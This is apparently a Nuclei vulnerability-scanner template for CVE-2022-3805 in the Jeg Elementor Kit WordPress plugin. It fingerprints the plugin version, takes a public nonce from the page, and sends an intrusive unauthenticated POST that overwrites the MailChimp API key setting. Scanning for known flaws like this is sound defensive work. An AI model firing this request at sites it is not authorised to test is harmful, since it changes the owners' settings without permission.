id: CVE-2022-3805 info: name: Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update author: DhiyaneshDk,popcorn94 severity: high description: | The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements. impact: | Unauthenticated attackers can exploit authorization bypass using easily obtained nonces to update plugin settings including MailChimp API keys, global styles, and 404 page configurations, potentially compromising site integrations and design. remediation: Fixed in 2.5.7 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-3805 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit/jeg-elementor-kit-256-unauthenticated-authorization-bypass - https://wordpress.org/plugins/jeg-elementor-kit/#developers - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9955d65-afb3-4d28-abd2-9f2fec92d013 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L cvss-score: 8.6 cve-id: CVE-2022-3805 cwe-id: CWE-79 epss-score: 0.08483 epss-percentile: 0.92575 cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: jegtheme product: jeg_elementor_kit framework: wordpress shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit" fofa-query: body="/wp-content/plugins/jeg-elementor-kit/" publicwww-query: "/wp-content/plugins/jeg-elementor-kit/" tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln variables: rand: "{{rand_text_numeric(5)}}" flow: http(1) && http(2) && http(3) http: - raw: - | GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'compare_versions(version, "< 2.5.7")' - 'contains(body, "Jeg Elementor Kit")' - 'status_code == 200' condition: and internal: true extractors: - type: regex name: version part: body group: 1 regex: - "(?mi)Stable tag: ([0-9.]+)" internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers: - type: dsl dsl: - status_code == 200 - contains(body, "jeg-elementor-kit") - contains(content_type, "text/html") condition: and internal: true extractors: - type: regex group: 1 name: nonce regex: - 'jkit_nonce = "([a-zA-Z0-9]{10})"' internal: true - type: regex group: 1 name: url regex: - 'jkit_ajax_url = "(http[s]?://[^"]+)"' internal: true - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded jkit-ajax-request=jkit_elements&form_data[mailchimp_api_key]={{rand}}&action=save_user_data&nonce={{nonce}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "Success Save Data") - contains(content_type, "application/json") condition: and # digest: 4a0a004730450221008031b08a6252cbdc8ec6754528844e77f3ffe67f20439c1a2dd3e31f33b46ef4022050ff9a63d6286b966a84ecf1f9707825f9b7350d092c101f5a7b4693eceb8ce7:922c64590222798bb761d5b6d8e72950